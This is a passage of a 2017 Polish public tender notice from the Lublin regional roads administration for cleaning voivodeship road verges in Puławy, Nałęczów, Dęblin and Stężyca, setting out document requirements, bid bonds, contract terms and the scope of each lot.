b) Wykazu osób, o którym mowa w pkt. IV.2.2) SIWZ, skierowanych przez Wykonawcę do realizacji zamówienia wraz z imionami i nazwiskami tych osób oraz informacjami na temat ich funkcji w realizacji zamówienia, a także informacją o podstawie dysponowania tymi osobami.
c) Wykazu potencjału technicznego, o którym mowa w pkt. IV.2.3) SIWZ, dostępnego Wykonawcy w celu realizacji zamówienia wraz z informacją               o podstawie dysponowania tymi zasobami.
2) W celu potwierdzenia spełniania warunku udziału polegającego na posiadaniu uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania Wykonawca dołączy aktualne zaświadczenie o wpisie do rejestru działalności regulowanej w zakresie odbierania odpadów komunalnych na terenie gminy Miasto Puławy.
3) W celu potwierdzenia braku podstaw wykluczenia wykonawcy z udziału w postępowaniu zamawiający będzie żądał następujących dokumentów: 
a) odpisu z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu potwierdzenia braku podstaw wykluczenia na podstawie art. 24 ust. 5 pkt. 1 ustawy PZP; 
b) oświadczenia Wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej, przekazane Zamawiającemu w terminie 3 dni od dnia zamieszczenia przez Zamawiającego na stronie internetowej informacji dotyczących: 
1) kwoty, jaką zamierza przeznaczyć na sfinansowanie zamówienia; 
2) firm oraz adresów Wykonawców, którzy złożyli oferty w terminie; 
3) ceny, terminu wykonania zamówienia, warunków płatności zawartych w ofertach, 
W przypadku przynależności do tej samej grupy kapitałowej Wykonawca może złożyć wraz z oświadczeniem dokumenty bądź informacje potwierdzające, że powiązania z innym Wykonawcą nie prowadzą do zakłócenia konkurencji w postępowaniu. 
c) Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast dokumentów, o których mowa w pkt. a., składa dokument lub dokumenty wystawione w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że nie otwarto jego likwidacji ani nie ogłoszono upadłości  wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
d) Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania lub miejsce zamieszkania ma osoba, której dokument dotyczy, nie wydaje się dokumentów, o których mowa w pkt. c., zastępuje się je dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby lub osób uprawnionych do Jego reprezentacji, lub oświadczenie osoby, której dokument miał dotyczyć, złożone przed właściwym notariuszem lub organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę miejsce zamieszkania Wykonawcy lub miejsce zamieszkania tej osoby  wystawionym nie wcześniej niż 6 miesięcy przed upływem terminu składania ofert.
W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia (spółki cywilne, konsorcja) dokumenty i oświadczenia określone w pkt. a.  d. składa każdy z Wykonawców wspólnie ubiegających się o udzielenie zamówienia).<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Oprócz oświadczeń stanowiących, że Wykonawca nie podlega wykluczeniu oraz spełniania warunki udziału w postępowaniu,  Wykonawca obowiązany jest dołączyć do oferty:
1) Dowód wniesienia wadium.
2) Ofertę przetargową (z ceną netto i z podatkiem VAT) (wzór załącznik A) wraz                  z formularzem cenowym (wzór załącznik A1).
3) Zobowiązanie lub inne dokumenty podmiotów do oddania Wykonawcy do dyspozycji niezbędnych zasobów na potrzeby realizacji zamówienia w przypadku, gdy Wykonawca polega na zdolnościach innych podmiotów.
4)W przypadku wspólnego ubiegania się Wykonawców o udzielenie zamówienia, do oferty należy załączyć dokument ustanawiający pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu            i zawarcia umowy w sprawie zamówienia publicznego zgodnie z art. 23 ust. 1 i 2 ustawy Prawo zamówień publicznych.
5) W przypadku, gdy ofertę oraz załączniki w imieniu Wykonawcy podpisuje pełnomocnik, do oferty należy załączyć pełnomocnictwo określające jego zakres,  podpisane przez osoby uprawnione do reprezentacji Wykonawcy.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  tak,
                  <br />
                  Informacja na temat wadium
                  <br />1. Warunkiem uczestnictwa w przetargu jest wniesienie wadium w wysokościach: 
a. Zad. nr 1: 900,00 zł (słownie złotych: dziewięćset 00/100)
b. Zad. nr 2: 300,00 zł (słownie złotych: trzysta 00/100)
c. Zad. nr 3: 500,00 zł (słownie złotych: pięćset 00/100)
d. Zad. nr 4: 100,00 zł (słownie złotych: sto 00/100)
e. Zad. nr 5: 300,00 zł (słownie złotych: trzysta 00/100)
2. Wadium może być wnoszone w formach określonych w art. 45, ust. 6 ustawy Prawo zamówień publicznych.
1) Pieniądzu;
2) Poręczeniach bankowych lub poręczeniach spółdzielczej kasy oszczędnościowo  kredytowej, z tym, że poręczenie kasy jest zawsze poręczeniem pieniężnym;
3)Gwarancjach bankowych;
4) Gwarancjach ubezpieczeniowych;
5) Poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt. 2 ustawy z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości (Dz. U. z 2007 Nr  42 poz. 275, z późn. zm.)
3. Wadium wnoszone w formie pieniężnej należy wpłacić przelewem na konto ZDW w Lublinie w Banku PKO Bank Polski S.A. nr: 74 1020 3147 0000 8002 0105 5730.
4. W ofercie należy złożyć dokument potwierdzający wniesienie wadium.
UWAGA:
1) Wadium w pieniądzu należy wnosić ściśle z dyspozycją art. 45 ust. 7 ustawy Prawo zamówień publicznych, tzn. przelewem na rachunek bankowy wskazany przez zamawiającego. W myśl art. 63. ust. 3 pkt. 1 ustawy Prawo bankowe z dnia 29 sierpnia 1997 (Dz. U z 2012 poz. 1376 z późn. zm.) polecenie przelewu jest jedną z form rozliczenia bezgotówkowego. Zgodnie z art. 63c Prawa bankowego polecenie przelewu stanowi udzieloną bankowi dyspozycję dłużnika obciążenia jego rachunku określoną kwotą i uznania tą kwotą rachunku wierzyciela. 
Oznacza to, że wpłata gotówkowa wadium wnoszona na poczcie lub w banku nie stanowi polecenia przelewu w rozumieniu wyżej cytowanych artykułów.
2) Wadium wnoszone przelewem (art. 45 ust. 7 ustawy PZP) uważa się za wniesione w terminie, jeżeli wpłynie na konto ZDW w Lublinie przed upływem terminu składania ofert. 
5. Zamawiający zatrzymuje wadium wraz odsetkami w przypadkach określonych w art. 46 ust. 4 a i 5 ustawy PZP.  </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />1. Zmiany i uzupełnienia treści Umowy wymagają dla swej ważności formy pisemnej.
2. Zamawiający zgodnie z art. 144 ustawy Prawo zamówień publicznych przewiduje możliwość dokonania zmian postanowień zawartej Umowy w stosunku do treści oferty, polegających na:
1) zmianie wynagrodzenia Umowy w przypadku, gdy zmianie uległy stawki podatku VAT  wynagrodzenie ulegnie zmianie w ten sposób, że wynagrodzenie netto pozostanie takie samo, a wartość podatku VAT i wynagrodzenie brutto ulegną zmianie. 
2) zmianach podwykonawcy  podmiotu, na którego zasoby Wykonawca powoływał się w złożonej ofercie, na zasadach określonych w art. 22a ust. 1 ustawy PZP, w celu potwierdzenia spełniania warunków udziału w postępowaniu  w przypadku akceptacji przez Zamawiającego wskazanego innego podwykonawcy po wykazaniu, iż proponowany inny podwykonawca spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby Wykonawca się powołuje w trakcie postępowania o udzielenie zamówienia.
3) rezygnacji z podwykonawcy  podmiotu, na którego zasoby Wykonawca powoływał się w złożonej ofercie, na zasadach określonych w art. 22a ust. 1 ustawy PZP, w celu potwierdzenia spełniania warunków udziału w postępowaniu  w przypadku wykazania Zamawiającemu, iż Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż podwykonawca, na którego zasoby Wykonawca się powołuje w trakcie postępowania o udzielenie zamówienia.
4) powierzeniu podwykonawcy realizacji części zamówienia  w przypadku, gdy Wykonawca w ofercie nie wskazał części, którą na etapie realizacji zamówienia zamierza powierzyć podwykonawcy. <br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 01/03/2017, godzina: 9:30,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br />Informacje o sposobie porozumiewania się Zamawiającego z Wykonawcami oraz przekazywania oświadczeń lub dokumentów, a także wskazanie osób uprawnionych do porozumiewania się z Wykonawcami.
1. Komunikacja między Zamawiającym a Wykonawcami odbywa się za pośrednictwem operatora pocztowego w rozumieniu ustawy z dnia 23 listopada 2012 r.  Prawo pocztowe (Dz. U. poz. 1529 oraz z 2015 r. poz. 1830), osobiście, za pośrednictwem posłańca, faksu pod numerem: 81 886 41 03 lub przy użyciu środków komunikacji elektronicznej na e-mail: rdw.pulawy@zdw.lublin.pl, w rozumieniu ustawy z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną (Dz. U. z 2016 r., poz. 1030 i 1579).
2. Jeżeli Zamawiający lub Wykonawca przekazują oświadczenia, wnioski, zawiadomienia oraz informacje faksem lub przy użyciu środków komunikacji elektronicznej w rozumieniu ustawy  z dnia 18 lipca 2002 r. o świadczeniu usług drogą elektroniczną, każda ze stron, na żądanie drugiej niezwłocznie potwierdza fakt ich otrzymania.
3. Językiem do porozumiewania się jest język polski.        
Osoby uprawnione do porozumiewania się z Wykonawcami: 
W sprawach technicznych oraz formalno  prawnych, związanych z postępowaniem o udzielenie zamówienia i zawarciem umowy  Artur Wiak, Aleksandra Pijanowska, 
w godz. 08:00  14:00, tel. 81 886 41 03, 886 31 63.   </div></div><div class="headerLarge_xforms" style="text-align: center"><u>
                ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH
              </u></div><div><b>Część nr: </b>1
                  
                <b>Nazwa: </b>Zadanie nr 1:  Usługi utrzymania czystości w pasach drogowych dróg wojewódzkich administrowanych przez RDW w Puławach  na terenie miasta Puławy  <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 1: Oczyszczanie pasów drogowych dróg wojewódzkich na terenie miasta Puławy: 
a. nr 801 (ul.: Dęblińska, Piaskowa, Czartoryskich, Głęboka),
b. nr 824 (ul.: Zielona, Kazimierska, Włostowicka),
c. nr 874 (ul. Centralna, Piłsudskiego) 
Oczyszczanie: 
1. Jezdnie (maks.)  14 232 mb; 28 464 m
2. Chodniki i ścieżki rowerowe (maks.)  22 592 mb; 50 476 m
3. Wyspy rozdzielające i azyle dla pieszych (maks.)  5 209 m
4. Tereny zielone  67 500 m
5. Pas drogowy (powierzchnia ogólna)  151 649 m
Rodzaj i krotność czyszczeń:
a) 1-krotne oczyszczenie nawierzchni jezdni wraz z opaskami przy krawężnikach, ścieżek rowerowych, chodników, wysp rozdzielających i azyli dla pieszych po zakończeniu sezonu zimowego 2016/2017
b) 6-krotne oczyszczenie nawierzchni jezdni wraz z opaskami w okresie marzec  listopad 2017, 
c) 4-krotne oczyszczenie nawierzchni ścieżek rowerowych i chodników w okresie marzec  listopad 2017,
d) 4-krotne oczyszczenie wysp rozdzielających i azyli dla pieszych w okresie marzec  listopad 2017,
e) 1-krotne wiosenne roboty porządkowe na terenach zielonych w okresie marzec / kwiecień 2017,
f) 12-krotne zbieranie śmieci i nieczystości z terenu pasów drogowych (w tym jesienne uprzątnięcie liści) w okresie marzec  grudzień 2017     <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90600000-3, 90610000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  61533.50<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 10<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>2
                  
                <b>Nazwa: </b>Zadanie nr 2:  Usługi utrzymania czystości w pasach drogowych dróg wojewódzkich administrowanych przez RDW w Puławach  na terenie miasta Nałęczów <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 2: Oczyszczanie pasów drogowych dróg wojewódzkich na terenie miasta Nałęczów: 
a.nr 826 (ul. Kolejowa),
b. nr 830 (ul.: Bochotnica, Charz A),
Oczyszczanie: 
1. Jezdnie (maks.)  5 177 mb; 10 354 m
2. Chodniki (maks.)  6 758 mb; 10 497 m
3. Tereny zielone  20 800 m
4. Pas drogowy (powierzchnia ogólna)  41 651 m
Rodzaj i krotność czyszczeń:
a) 1-krotne oczyszczenie nawierzchni jezdni wraz z opaskami przy krawężnikach oraz chodników po zakończeniu sezonu zimowego 2016/2017
b) 6-krotne oczyszczenie nawierzchni jezdni wraz z opaskami w okresie marzec  listopad 2017, 
c) 4-krotne oczyszczenie nawierzchni chodników w okresie marzec  listopad 2017,
d) 1-krotne wiosenne roboty porządkowe na terenach zielonych w okresie marzec / kwiecień 2017,
e) 12-krotne zbieranie śmieci i nieczystości z terenu pasów drogowych (w tym jesienne uprzątnięcie liści) w okresie marzec  grudzień 2017<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90600000-3, 90610000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  19981.90<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 10<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>3
                  
                <b>Nazwa: </b>Zadanie nr 3:  Usługi utrzymania czystości w pasach drogowych dróg wojewódzkich administrowanych przez RDW w Puławach  na terenie miasta Dęblin i m. Stężyca <br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 3: Oczyszczanie pasów drogowych dróg wojewódzkich na terenie: 
miasta Dęblin: 
a. nr 801 (ul.: Mickiewicza, Stężycka, Podchorążych),
b. nr 831 (ul. Wiślana),
m. Stężyca 
a. nr 801 (ul. Królewska, Dęblińska) 
miasto Dęblin:
Oczyszczanie: 
1. Jezdnie (maks.)  4 345 mb; 8 690 m
2. Chodniki i ścieżki rowerowe (maks.)  6 281 mb; 14 717 m
3. Tereny zielone  49 600 m
4. Pas drogowy (powierzchnia ogólna)  73 007 m
Rodzaj i krotność czyszczeń:
a) 1-krotne oczyszczenie nawierzchni jezdni wraz z opaskami przy krawężnikach oraz chodników i ścieżek rowerowych po zakończeniu sezonu zimowego 2016/2017
b) 6-krotne oczyszczenie nawierzchni jezdni wraz z opaskami w okresie marzec  listopad 2017, 
c) 4-krotne oczyszczenie nawierzchni chodników i ścieżek rowerowych w okresie marzec  listopad 2017,
d) 1-krotne wiosenne roboty porządkowe na terenach zielonych w okresie marzec / kwiecień 2017,
e) 12-krotne zbieranie śmieci i nieczystości z terenu pasów drogowych (w tym jesienne uprzątnięcie liści) w okresie marzec  grudzień 2017     
m. Stężyca:
Oczyszczanie: 
1. Jezdnie (maks.)  3 065 mb; 3 065 m
Rodzaj i krotność czyszczeń:
a) 1-krotne oczyszczenie nawierzchni jezdni wraz z opaskami przy krawężnikach po zakończeniu sezonu zimowego 2016/2017,
b) 3-krotne oczyszczenie nawierzchni jezdni wraz z opaskami w okresie marzec  listopad 2017, <br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90600000-3, 90610000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  32980.11<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      okres w miesiącach: 10<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>cena</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>4
                  
                <b>Nazwa: </b>Zadanie nr 4: Usługi utrzymania czystości w pasach drogowych dróg wojewódzkich administrowanych przez RDW w Puławach  wzdłuż dróg nr: 738, 743, 824, 826,  830   i 874<br /><div style="padding-left: 20px"><b>
                    1) Krótki opis przedmiotu zamówienia </b><i>(wielkość, zakres, rodzaj i ilość dostaw, usług lub robót budowlanych lub określenie zapotrzebowania i wymagań)</i><b> a w przypadku partnerstwa innowacyjnego - określenie zapotrzebowania na innowacyjny produkt, usługę lub roboty budowlane:</b>Zadanie nr 4: Oczyszczanie pasów drogowych dróg wojewódzkich na terenie OD Puławy: 
a. nr 874 most przez rz. Wisłę i odc. Góra Puławska  Klikawa   
b. nr 738 w m. Góra Puławska (ul. Kozienicka), odc. Bronowice  Kowala  
c. nr 743 w m. Góra Puławska (ul. Janowiecka), 
d. nr 824 w m. Bochotnica (ul.: Puławska, Nałęczowska), m. Karczmiska 
e. nr 826 odc. Przybysławice  Strzelce, 
f. nr 830 w m. Bochotnica, Wierzchoniów, Wąwolnica  
1) Zadanie nr 4 OD Puławy: na odcinkach dróg wojewódzkich nr: 
- 824: od km 20+888 do km 22+453 (m. Bochotnica)
- 824: od km 34+438 do km 35+050 (m. Karczmiska)
- 826: od km 020 do km 1+100 i od km 3+155 do km 7+600 (odc. Przybysławice  Strzelce)
- 830: od km 39+362 do km 39+887 (m. Wierzchoniów) 
- 830: od km 41+778 do km 41+ 927 (m. Bochotnica)
- 830: od km 28+230 do km 29+670 (m. Wąwolnica) 
- 874 most przez rz. Wisłę w m. Puławy
- 874: odcinek Góra Puławska  Klikawa
- 738: od km 21+345 do km 21+560, str. L i P oraz od km 24+000 do km 25+050, str. L i od km 24+200 do km 25+050, str. P. (ul. Kozienicka) 
- 743: od km 0+000 do km 0+700, str. L i P (ul. Janowiecka) 
Oczyszczanie: 
1. Jezdnie (maks.)  18 292 mb; 18 292 m
2. Chodniki (maks.)  14 597 mb; 25 838 m
Rodzaj i krotność czyszczeń:
a) 1-krotne oczyszczenie nawierzchni jezdni wraz z opaskami przy krawężnikach oraz chodników po zakończeniu sezonu zimowego 2016/2017<br /><b>2) Wspólny Słownik Zamówień (CPV): </b>90600000-3, 90610000-6<br /><b>3) Wartość części zamówienia (jeżeli zamawiający podaje informacje o wartości zamówienia):</b><br />
                  Wartość bez VAT:
                  8483.40<br />
                  Waluta:
                  <br /><div style="padding-left: 20px">PLN<br /><b>4) Czas trwania lub termin wykonania: </b>
                      data zakończenia: 15/04/2017<br /><b>5) Kryteria oceny ofert: </b><table style="padding-left: 20px"><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>na</td><td>100</td></tr></table><b>
                      6) INFORMACJE DODATKOWE:
                    </b><br /></div></div><br /></div><div><b>Część nr: </b>5
                  
                <b>Nazwa: </b>Zadanie nr 5:  Usługi utrzymania czystości w pasach drogowych dróg wojewódzkich administrowanych przez RDW w Puławach  odbiór śmieci ze śmietniczek ulicznych zlokalizowanych w ciągu dróg wojewódzkich na terenie miasta Puławy<br /><div style="padding-left: 20px"><b>
